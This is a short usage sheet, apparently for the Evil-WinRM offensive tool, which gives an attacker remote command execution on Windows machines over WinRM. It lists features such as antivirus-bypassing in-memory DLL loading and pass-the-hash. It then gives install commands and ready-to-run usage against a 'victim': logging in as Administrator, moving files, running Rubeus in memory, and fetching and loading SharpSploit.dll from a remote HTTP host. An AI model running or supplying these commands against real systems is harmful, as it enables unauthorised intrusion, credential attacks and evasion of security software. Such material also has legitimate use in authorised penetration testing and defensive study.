evil-winrm

Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: A service that allows administrators to remotely execute commands on a Windows machine).

Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.

Some features include:

• Loading in memory Powershell scripts

• Loading in memory dll files bypassing some AVs

• Loading x64 payloads

• Pass-the-hash support

• Uploading and downloading local and remote files

Install: (Git)

sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Install: (Ruby gem)

gem install evil-winrm

Alternative installation instructions can be found here.

Usage:

# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll